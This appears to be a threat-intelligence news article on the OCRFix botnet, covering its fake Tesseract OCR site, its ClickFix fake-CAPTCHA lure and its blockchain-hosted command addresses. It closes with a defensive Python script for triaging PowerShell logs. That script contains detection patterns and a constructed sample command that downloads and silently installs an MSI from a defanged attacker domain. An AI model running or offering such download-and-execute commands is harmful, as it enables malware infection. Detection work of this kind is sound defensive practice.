A newly uncovered cyber threat, known as the OCRFix botnet, is leveraging advanced tactics to build a stealthy network of compromised devices. Combining social engineering with blockchain technology, this campaign is proving difficult to detect and dismantle.
The OCRFix operation integrates ClickFix phishing strategies and a novel method called EtherHiding, which stores command instructions on a blockchain. This approach complicates traditional takedown efforts, as attacker directives are stored on a decentralized platform.
Phishing Tactics and Initial Entry
The attack begins with a fraudulent website mimicking tesseract-ocr[.]com, a deceptive version of the legitimate Tesseract OCR tool. The absence of an official website for the open-source project made it an easy target for domain impersonation.
The site was promoted through SEO poisoning and LLM poisoning (the ChatGPT chatbot was observed inadvertently directing users to the malicious site), and a YouTube video was also found promoting the same deceptive instructions.
Cyjax analysts discovered the campaign during routine monitoring, noting that the phishing site used a fake CAPTCHA to trick users. Upon clicking ‘verify,’ a hidden PowerShell command is copied to the user’s clipboard, instructing them to paste it into Windows PowerShell under the guise of a verification step.
Malware Deployment and Infection Chain
The PowerShell command connects to a server at opsecdefcloud[.]com, downloading a harmful MSI file that initiates the malware deployment. Victims are then redirected to the legitimate Tesseract GitHub page to maintain the illusion of authenticity.
The malware unfolds in three stages, beginning with Update1.exe, which retrieves a C2 address from a BNB TestNet smart contract. It then downloads a data.zip package from attacker-controlled servers.
Subsequent stages involve setup_helper.exe establishing persistence through a scheduled task, and CfgHelper.exe acting as a bot listener, sending victim data to a control panel at ldture[.]com. Cyrillic comments in the source code suggest a possible Russian origin, though this remains speculative.
Leveraging Blockchain for Command and Control
A unique aspect of OCRFix is its use of EtherHiding for C2 communications. By embedding C2 URLs in BNB Smart Chain TestNet smart contracts, attackers evade traditional server blockades and can update URLs directly on the blockchain.
This technique, previously associated with North Korean actors, indicates wider adoption among cybercriminals. Because the blockchain itself cannot be altered or taken down by third parties, attackers can update the command addresses stored in their own contract without fear of losing the channel.
Organizations are advised to restrict PowerShell execution and enable script block logging to detect such obfuscations. Security training should emphasize the dangers of fake CAPTCHA prompts and pasting unknown commands. Network monitoring for public blockchain node connections is also recommended.
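As an added illustration of the script block logging recommendation (this is not code from the Cyjax report or from this article), the routine below triages PowerShell script block events (Event ID 4104) and flags the download-then-silent-install pattern and encoded commands typical of ClickFix pastes; the event records, user names and the encoded sample are constructed, and the defanged domain is the one named above.

```python
import re

# Constructed 4104 (script block logging) records, not real telemetry.
# The "script" field is what Microsoft-Windows-PowerShell/Operational
# records once script block logging is enabled; the second entry mimics
# the ClickFix flow described above (fetch an MSI, install it silently).
SAMPLE_EVENTS = [
    {"id": 4104, "user": "WS01\\alice",
     "script": "Get-ChildItem $env:USERPROFILE\\Documents -Recurse | Measure-Object"},
    {"id": 4104, "user": "WS02\\bob",
     "script": "powershell -w hidden -ep bypass -c \"iwr hxxp://opsecdefcloud[.]com/f.msi "
               "-OutFile $env:TEMP\\f.msi; msiexec /i $env:TEMP\\f.msi /qn\""},
    {"id": 4104, "user": "WS03\\carol",
     "script": "Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"},
    # Constructed: UTF-16LE base64 of "Invoke-WebRequest " (a truncated encoded command).
    {"id": 4104, "user": "WS04\\dave",
     "script": "powershell -nop -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAA"},
]

# Indicator categories, each a case-insensitive regex over the script text.
INDICATORS = {
    "download": r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|net\.webclient|start-bitstransfer)\b",
    "msi_install": r"\b(msiexec|\S+\.msi)\b",
    "evasion_flag": r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-nop(rofile)?\b",
    "encoded_cmd": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
}

def classify(script: str) -> set:
    """Return the set of indicator categories present in one script block."""
    return {name for name, pat in INDICATORS.items() if re.search(pat, script, re.I)}

def is_suspicious(cats: set) -> bool:
    """Any encoded command, or a download paired with an installer or evasion flags.
    A plain download on its own (e.g. an intranet report) is not flagged."""
    if "encoded_cmd" in cats:
        return True
    return "download" in cats and bool(cats & {"msi_install", "evasion_flag"})

def triage(events):
    """Return (user, sorted categories) for each 4104 event that meets the rule."""
    hits = []
    for ev in events:
        if ev["id"] != 4104:
            continue
        cats = classify(ev["script"])
        if is_suspicious(cats):
            hits.append((ev["user"], sorted(cats)))
    return hits

if __name__ == "__main__":
    for user, cats in triage(SAMPLE_EVENTS):
        print(f"{user}: {', '.join(cats)}")
```

In production the same rule would run over exported 4104 events from the endpoint or SIEM rather than the inline list, and the indicator table is where local tuning belongs.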